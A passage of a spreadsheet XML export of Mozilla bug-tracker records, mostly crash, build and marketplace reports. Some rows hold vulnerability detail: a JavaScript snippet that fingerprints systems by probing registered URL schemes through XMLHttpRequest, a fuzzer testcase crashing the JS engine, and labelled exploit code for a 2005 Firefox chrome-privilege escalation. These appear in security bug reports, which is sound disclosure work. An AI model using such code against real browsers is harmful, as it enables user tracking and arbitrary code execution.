      <c r="X2365" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2366">
      <c r="A2366" t="n">
        <v>424558</v>
      </c>
      <c r="B2366" t="inlineStr">
        <is>
          <t>2008-03-22 11:47:14 -0700</t>
        </is>
      </c>
      <c r="C2366" t="inlineStr">
        <is>
          <t>Use after free in decompiler</t>
        </is>
      </c>
      <c r="D2366" t="inlineStr">
        <is>
          <t>2011-08-10 16:28:38 -0700</t>
        </is>
      </c>
      <c r="E2366" t="n">
        <v>1</v>
      </c>
      <c r="F2366" t="n">
        <v>1</v>
      </c>
      <c r="G2366" t="n">
        <v>3</v>
      </c>
      <c r="H2366" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2366" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2366" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2366" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2366" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2366" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2366" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2366" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2366" t="inlineStr">
        <is>
          <t>[sg:moderate] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2366" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2366" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2366" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2366" t="n">
        <v>1</v>
      </c>
      <c r="U2366" t="n">
        <v>0</v>
      </c>
      <c r="V2366" t="n">
        <v>60</v>
      </c>
      <c r="W2366" t="inlineStr">
        <is>
          <t>Created attachment 311171
test.js
CentOS 5 64 bit
==24943== Invalid read of size 1
==24943==    at 0x4A06990: memmove (mc_replace_strmem.c:503)
==24943==    by 0x4813DA: SprintPut (jsopcode.c:455)
==24943==    by 0x481435: SprintCString (jsopcode.c:463)
==24943==    by 0x48654F: Decompile (jsopcode.c:2079)
==24943==    by 0x48A04A: Decompile (jsopcode.c:2988)
==24943==    by 0x491EA6: DecompileCode (jsopcode.c:4606)
==24943==    by 0x4928D7: js_DecompileFunction (jsopcode.c:4786)
==24943==    by 0x41FBB0: JS_DecompileFunction (jsapi.c:4830)
==24943==    by 0x45B963: fun_toStringHelper (jsfun.c:1491)
==24943==    by 0x45B9E7: fun_toSource (jsfun.c:1508)
==24943==    by 0x467FF6: js_Invoke (jsinterp.c:1186)</t>
        </is>
      </c>
      <c r="X2366" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2367">
      <c r="A2367" t="n">
        <v>134370</v>
      </c>
      <c r="B2367" t="inlineStr">
        <is>
          <t>2002-03-30 00:39:44 -0800</t>
        </is>
      </c>
      <c r="C2367" t="inlineStr">
        <is>
          <t>Moz displays my ftp password in 24-pt bold font</t>
        </is>
      </c>
      <c r="D2367" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E2367" t="n">
        <v>1</v>
      </c>
      <c r="F2367" t="n">
        <v>1</v>
      </c>
      <c r="G2367" t="n">
        <v>6</v>
      </c>
      <c r="H2367" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2367" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2367" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K2367" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2367" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2367" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2367" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2367" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q2367" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2367" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2367" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T2367" t="n">
        <v>1</v>
      </c>
      <c r="U2367" t="n">
        <v>0</v>
      </c>
      <c r="V2367" t="n">
        <v>20</v>
      </c>
      <c r="W2367" t="inlineStr">
        <is>
          <t>Builds 03/14 and 03/29.
Steps to reproduce:
1. Go to ftp://anonymous:mypassword@ftp.mozilla.org/ .
Sure, the password is already on the screen, but displaying it again in an &lt;h1&gt;
is about as secure as yelling the password across a computer lab.</t>
        </is>
      </c>
      <c r="X2367" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2368">
      <c r="A2368" t="n">
        <v>1447695</v>
      </c>
      <c r="B2368" t="inlineStr">
        <is>
          <t>2018-03-21 09:02:56 -0700</t>
        </is>
      </c>
      <c r="C2368" t="inlineStr">
        <is>
          <t>Intermittent build failure IOError: [Errno 28] No space left on device</t>
        </is>
      </c>
      <c r="D2368" t="inlineStr">
        <is>
          <t>2020-03-16 07:55:19 -0700</t>
        </is>
      </c>
      <c r="E2368" t="n">
        <v>1</v>
      </c>
      <c r="F2368" t="n">
        <v>1</v>
      </c>
      <c r="G2368" t="n">
        <v>7</v>
      </c>
      <c r="H2368" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2368" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2368" t="inlineStr">
        <is>
          <t>Task Configuration</t>
        </is>
      </c>
      <c r="K2368" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2368" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2368" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2368" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2368" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2368" t="inlineStr">
        <is>
          <t>[stockwell unknown]</t>
        </is>
      </c>
      <c r="Q2368" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2368" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2368" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2368" t="n">
        <v>1</v>
      </c>
      <c r="U2368" t="n">
        <v>0</v>
      </c>
      <c r="V2368" t="n">
        <v>75</v>
      </c>
      <c r="W2368" t="inlineStr">
        <is>
          <t>Filed by: ncsoregi [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=169425510&amp;repo=mozilla-central
https://queue.taskcluster.net/v1/task/AhoCr1W9QfSaPNa3wdoNQA/runs/0/artifacts/public/logs/live_backing.log
[task 2018-03-21T13:08:29.019Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.019Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.024Z]     self.flush()
[task 2018-03-21T13:08:29.024Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.024Z]     self.stream.flush()
[task 2018-03-21T13:08:29.024Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.024Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.024Z] 13:08:29     INFO -      self._data.write(content)
[task 2018-03-21T13:08:29.024Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.024Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.024Z]     self.flush()
[task 2018-03-21T13:08:29.024Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.024Z]     self.stream.flush()
[task 2018-03-21T13:08:29.024Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.024Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.024Z] 13:08:29     INFO -  IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.024Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.024Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.024Z]     self.flush()
[task 2018-03-21T13:08:29.024Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.024Z]     self.stream.flush()
[task 2018-03-21T13:08:29.024Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.024Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.024Z] 13:08:29     INFO -  /builds/worker/workspace/build/src/testing/testsuite-targets.mk:158: recipe for target 'package-tests-gtest' failed
[task 2018-03-21T13:08:29.024Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.024Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.024Z]     self.flush()
[task 2018-03-21T13:08:29.024Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.024Z]     self.stream.flush()
[task 2018-03-21T13:08:29.024Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.024Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.024Z] 13:08:29     INFO -  make[2]: *** [package-tests-gtest] Error 1
[task 2018-03-21T13:08:29.024Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.025Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.025Z]     self.flush()
[task 2018-03-21T13:08:29.025Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.025Z]     self.stream.flush()
[task 2018-03-21T13:08:29.025Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.025Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.025Z] 13:08:29     INFO -  make[2]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox'
[task 2018-03-21T13:08:29.025Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.025Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.025Z]     self.flush()
[task 2018-03-21T13:08:29.025Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.025Z]     self.stream.flush()
[task 2018-03-21T13:08:29.025Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.025Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.025Z] 13:08:29     INFO -  make[2]: *** Waiting for unfinished jobs....
[task 2018-03-21T13:08:29.025Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.025Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.025Z]     self.flush()
[task 2018-03-21T13:08:29.025Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.025Z]     self.stream.flush()
[task 2018-03-21T13:08:29.025Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.025Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.160Z] 13:08:29     INFO -  make[2]: Entering directory '/builds/worker/workspace/build/src/obj-firefox'
[task 2018-03-21T13:08:29.160Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.160Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.160Z]     self.flush()
[task 2018-03-21T13:08:29.161Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.161Z]     self.stream.flush()
[task 2018-03-21T13:08:29.161Z] IOError: [Errno 28] No space left on device
[task 2018-03-21T13:08:29.161Z] Logged from file log.py, line 585
[task 2018-03-21T13:08:29.161Z] 13:08:29     INFO -  /builds/worker/workspace/build/src/obj-firefox/_virtualenv/bin/python -m mozbuild.action.test_archive  web-platform '/builds/worker/workspace/build/src/obj-firefox/dist//target.web-platform.tests.tar.gz'
[task 2018-03-21T13:08:29.161Z] Traceback (most recent call last):
[task 2018-03-21T13:08:29.161Z]   File "/usr/lib/python2.7/logging/__init__.py", line 883, in emit
[task 2018-03-21T13:08:29.161Z]     self.flush()
[task 2018-03-21T13:08:29.161Z]   File "/usr/lib/python2.7/logging/__init__.py", line 843, in flush
[task 2018-03-21T13:08:29.161Z]     self.stream.flush()
[task 2018-03-21T13:08:29.161Z] IOError: [Errno 28] No space left on device</t>
        </is>
      </c>
      <c r="X2368" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2369">
      <c r="A2369" t="n">
        <v>1723281</v>
      </c>
      <c r="B2369" t="inlineStr">
        <is>
          <t>2021-07-31 06:21:07 -0700</t>
        </is>
      </c>
      <c r="C2369" t="inlineStr">
        <is>
          <t>Fast query of registered URL schemes through XMLHttpRequest for system fingerprinting</t>
        </is>
      </c>
      <c r="D2369" t="inlineStr">
        <is>
          <t>2024-05-30 10:35:22 -0700</t>
        </is>
      </c>
      <c r="E2369" t="n">
        <v>1</v>
      </c>
      <c r="F2369" t="n">
        <v>1</v>
      </c>
      <c r="G2369" t="n">
        <v>3</v>
      </c>
      <c r="H2369" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2369" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2369" t="inlineStr">
        <is>
          <t>DOM: Networking</t>
        </is>
      </c>
      <c r="K2369" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2369" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2369" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2369" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2369" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2369" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][fingerprinting][necko-triaged][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q2369" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2369" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2369" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T2369" t="n">
        <v>0</v>
      </c>
      <c r="U2369" t="n">
        <v>0</v>
      </c>
      <c r="V2369" t="n">
        <v>31</v>
      </c>
      <c r="W2369" t="inlineStr">
        <is>
          <t>System fingerprinting like https://schemeflood.com/ use a slow variant, the bug enables tracking-services to fast list up all registered URL protocols. The problem on URL scheme fingerprinting is, that it will create a fingerprint for the system and not just the browser.
Tested on Windows 10 with Firefox 92 and Firefox 90.
The problem is that XMLHttpRequest will return different status codes dependent on the registration-state of the protocol or not.
Javascript code snippet:
var scheme = "spotify://dummy";
try {
    var ajaxObj = new XMLHttpRequest()
        ajaxObj.open("GET", scheme, false);
    ajaxObj.send();
} catch (error) {
    if (ajaxObj.status === 0) {
        console.log("Protocol found: " + scheme);
    } else { // regulary ajaxObj.status == 200
        console.log("Protocol NOT found: " + scheme);
    }
}
A fix would be to disallow XMLHttpRequest requests with protocols others than http, https, ...</t>
        </is>
      </c>
      <c r="X2369" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2370">
      <c r="A2370" t="n">
        <v>1055513</v>
      </c>
      <c r="B2370" t="inlineStr">
        <is>
          <t>2014-08-19 06:15:42 -0700</t>
        </is>
      </c>
      <c r="C2370" t="inlineStr">
        <is>
          <t>Region exclusions (horribly?) broken</t>
        </is>
      </c>
      <c r="D2370" t="inlineStr">
        <is>
          <t>2014-09-02 05:57:08 -0700</t>
        </is>
      </c>
      <c r="E2370" t="n">
        <v>1</v>
      </c>
      <c r="F2370" t="n">
        <v>1</v>
      </c>
      <c r="G2370" t="n">
        <v>6</v>
      </c>
      <c r="H2370" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2370" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2370" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2370" t="inlineStr">
        <is>
          <t>Avenir</t>
        </is>
      </c>
      <c r="L2370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2370" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2370" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2370" t="inlineStr"/>
      <c r="Q2370" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2370" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2370" t="inlineStr">
        <is>
          <t>2014-09-02</t>
        </is>
      </c>
      <c r="T2370" t="n">
        <v>1</v>
      </c>
      <c r="U2370" t="n">
        <v>0</v>
      </c>
      <c r="V2370" t="n">
        <v>20</v>
      </c>
      <c r="W2370" t="inlineStr">
        <is>
          <t>The shopping list app [1] doesn't show in the search results in region:France, because as the DB and API indicates, France is an excluded region.  But the compatibility page shows only China is excluded.
There is the additional question (possibly linked) of why these regions were excluded in the first place.  There are another 1218(!) listed apps [2] with the same region exclusions of 21,22,24,25,26,27,28,29,30 and many other similar exclusions on other apps.
[1] https://marketplace.firefox.com/app/shopping-list/
[2] https://docs.google.com/a/mozilla.com/spreadsheets/d/1R6yr395kFeEK8dnw-GRZ8gqYO7w8oLe74lvrc7-Jgsw/edit#gid=1716371954</t>
        </is>
      </c>
      <c r="X2370" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2371">
      <c r="A2371" t="n">
        <v>951366</v>
      </c>
      <c r="B2371" t="inlineStr">
        <is>
          <t>2013-12-17 12:50:11 -0800</t>
        </is>
      </c>
      <c r="C2371" t="inlineStr">
        <is>
          <t>Assertion failure: obj, at dist/include/js/Value.h:527 or Crash on Heap with gcPreserveCode</t>
        </is>
      </c>
      <c r="D2371" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:33 -0800</t>
        </is>
      </c>
      <c r="E2371" t="n">
        <v>1</v>
      </c>
      <c r="F2371" t="n">
        <v>1</v>
      </c>
      <c r="G2371" t="n">
        <v>3</v>
      </c>
      <c r="H2371" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2371" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2371" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2371" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2371" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2371" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2371" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2371" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2371" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q2371" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2371" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2371" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2371" t="n">
        <v>1</v>
      </c>
      <c r="U2371" t="n">
        <v>0</v>
      </c>
      <c r="V2371" t="n">
        <v>16</v>
      </c>
      <c r="W2371" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision b980c2dee2e7 (run with --fuzzing-safe --ion-eager):
gcPreserveCode();
function assertEq(setter) {}
function raisesException(exception) {
    try {    } catch (actual) {  };
    if (typeof a == 'object') {
        for (var prop in a) {        }
    }
}
function build_getter(i) {
    var x = [ 1 ] ;
    return function f() { return x; }
}
function test() {
    var N = internalConst("INCREMENTAL_MARK_STACK_BASE_CAPACITY") + 2;
    var o = {};
    var descriptor = { enumerable: true};
    for (var i = (0); i != N; ++i) {
	descriptor.get = build_getter(i);
	Object.defineProperty(o, i, descriptor);
    }
    for (var i = 0; i != raisesException; ++i)
	assertEq(o[i][0], i);
}
evaluate("test();");</t>
        </is>
      </c>
      <c r="X2371" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2372">
      <c r="A2372" t="n">
        <v>123475</v>
      </c>
      <c r="B2372" t="inlineStr">
        <is>
          <t>2002-02-04 21:34:21 -0800</t>
        </is>
      </c>
      <c r="C2372" t="inlineStr">
        <is>
          <t>Trunk crash [@ little2_updatePosition] [@ XML_GetCurrentColumnNumber][@ nsExpatDriver::GetLine]</t>
        </is>
      </c>
      <c r="D2372" t="inlineStr">
        <is>
          <t>2014-04-26 03:18:45 -0700</t>
        </is>
      </c>
      <c r="E2372" t="n">
        <v>1</v>
      </c>
      <c r="F2372" t="n">
        <v>1</v>
      </c>
      <c r="G2372" t="n">
        <v>3</v>
      </c>
      <c r="H2372" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2372" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2372" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K2372" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2372" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2372" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N2372" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2372" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2372" t="inlineStr">
        <is>
          <t>[fix in hand][Need r=, sr=]</t>
        </is>
      </c>
      <c r="Q2372" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2372" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2372" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T2372" t="n">
        <v>1</v>
      </c>
      <c r="U2372" t="n">
        <v>0</v>
      </c>
      <c r="V2372" t="n">
        <v>28</v>
      </c>
      <c r="W2372" t="inlineStr">
        <is>
          <t>When visiting XML pages with &lt;script src="." /&gt;, I often get a crash with the 
following stack trace. The crash goes away after restarting, suggesting that it 
might be due to a race condition or something, depending on whether the script 
file is there/cached or not. I got the following stack trace when visiting: 
http://www.mozilla.org/projects/mathml/demo/mtable.xhtml
little2_updatePosition(const encoding * 0x01b09558 little2_encoding, const char 
* 0x034ab000, const char * 0x01220232, position * 0x046e8cac) line 1735 + 3 
bytes
XML_GetCurrentColumnNumber(void * 0x046e8ae0) line 1043 + 46 bytes
nsExpatDriver::HandleError(const char * 0x034bf2c8, unsigned int 2200, int 0) 
line 598 + 15 bytes
nsExpatDriver::ParseBuffer(const char * 0x034bf2c8, unsigned int 2200, int 0) 
line 634
nsExpatDriver::ConsumeToken(nsExpatDriver * const 0x046eaf04, nsScanner &amp; {...}, 
int &amp; 0) line 737 + 30 bytes
nsParser::Tokenize(int 1) line 2589 + 26 bytes
nsParser::ResumeParse(int 1, int 1, int 1) line 1846 + 12 bytes
nsParser::ContinueParsing() line 1495 + 19 bytes
nsXMLContentSink::ScriptEvaluated(nsXMLContentSink * const 0x046db820, unsigned 
int 0, nsIDOMHTMLScriptElement * 0x048eb4a8, int 0, int 1) line 1087
nsScriptLoader::FireScriptEvaluated(unsigned int 0, nsScriptLoadRequest * 
0x048ed4d0) line 538
nsScriptLoader::ProcessRequest(nsScriptLoadRequest * 0x048ed4d0) line 497
nsScriptLoader::OnStreamComplete(nsScriptLoader * const 0x046db754, 
nsIStreamLoader * 0x048ed3a0, nsISupports * 0x048ed4d0, unsigned int 0, unsigned 
int 4294967295, const char * 0x034f5982) line 787
nsStreamLoader::OnStopRequest(nsStreamLoader * const 0x048ed3a4, nsIRequest * 
0x048eb660, nsISupports * 0x048ed4d0, unsigned int 0) line 163
nsStreamListenerTee::OnStopRequest(nsStreamListenerTee * const 0x048f7710, 
nsIRequest * 0x048eb660, nsISupports * 0x048ed4d0, unsigned int 0) line 25
nsHttpChannel::OnStopRequest(nsHttpChannel * const 0x048eb664, nsIRequest * 
0x048ea624, nsISupports * 0x00000000, unsigned int 0) line 2454
nsOnStopRequestEvent::HandleEvent() line 213
nsARequestObserverEvent::HandlePLEvent(PLEvent * 0x048f5a14) line 116
PL_HandleEvent(PLEvent * 0x048f5a14) line 590 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00497860) line 520 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x004f07d2, unsigned int 49503, unsigned int 0, 
long 4814944) line 1071 + 9 bytes
USER32! 77e148dc()
USER32! 77e14aa7()
USER32! 77e266fd()
nsAppShellService::Run(nsAppShellService * const 0x004b5ac0) line 308
main1(int 1, char * * 0x00444ab0, nsISupports * 0x00000000) line 1285 + 32 bytes
main(int 1, char * * 0x00444ab0) line 1625 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e992a6()</t>
        </is>
      </c>
      <c r="X2372" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2373">
      <c r="A2373" t="n">
        <v>294795</v>
      </c>
      <c r="B2373" t="inlineStr">
        <is>
          <t>2005-05-19 08:04:30 -0700</t>
        </is>
      </c>
      <c r="C2373" t="inlineStr">
        <is>
          <t>QueryInterface.__proto__.__parent__ refers to the object generated by "nsExtensionManager.js"</t>
        </is>
      </c>
      <c r="D2373" t="inlineStr">
        <is>
          <t>2007-04-01 15:04:48 -0700</t>
        </is>
      </c>
      <c r="E2373" t="n">
        <v>1</v>
      </c>
      <c r="F2373" t="n">
        <v>1</v>
      </c>
      <c r="G2373" t="n">
        <v>3</v>
      </c>
      <c r="H2373" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2373" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2373" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2373" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L2373" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2373" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2373" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2373" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2373" t="inlineStr">
        <is>
          <t>[sg:fix] Bug details embargoed until August 1, 2005</t>
        </is>
      </c>
      <c r="Q2373" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2373" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2373" t="inlineStr">
        <is>
          <t>mozilla1.8beta3</t>
        </is>
      </c>
      <c r="T2373" t="n">
        <v>1</v>
      </c>
      <c r="U2373" t="n">
        <v>0</v>
      </c>
      <c r="V2373" t="n">
        <v>26</v>
      </c>
      <c r="W2373" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Any_XPCOM_Object.QueryInterface.__proto__.__parent__ refers to the object
generated by "nsExtensionManager.js". And content window can use its properties
and functions. This bug allows an attacker to run arbitrary code.
  s1 = new Script("Components.stack");
  s2 = new QueryInterface.__proto__.__parent__.Script("Components.stack");
When chrome calls s1.exec(), this error message appears:
  Error: function Script.prototype.exec must be called directly, and not by
  way of a function of another name
But, when chrome calls s2.exec(), its code is executed with chrome privilege.
And, there are ways to make chrome call a Script object created by content.
------
Target code: from nsExtensionManager.js
  var gModule = {
    getClassObject: function (aComponentManager, aCID, aIID) 
    {
      if (!aIID.equals(Components.interfaces.nsIFactory))
        throw Components.results.NS_ERROR_NOT_IMPLEMENTED;
      for (var key in this._objects) {
        if (aCID.equals(this._objects[key].CID))
          return this._objects[key].factory;
      }
      throw Components.results.NS_ERROR_NO_INTERFACE;
    },
Exploit code:
  var b = QueryInterface.__proto__.__parent__;
  var iid = { equals : new b.Script(code) };
  b.gModule.getClassObject(null, null, iid);
------
Note for trunk builds:
If user did install/uninstall or enable/disable Extensions, at next time user
start Firefox, QueryInterface.__proto__.__parent__ refers to the other object
generated by "inspector-cmdline.js". but, it doesn't stop exploits.
Affected:
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Firefox/1.0+
(Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Thunderbird/1.0.2
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050518 Thunderbird/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Thunderbird/1.0+
Reproducible: Always
Steps to Reproduce:</t>
        </is>
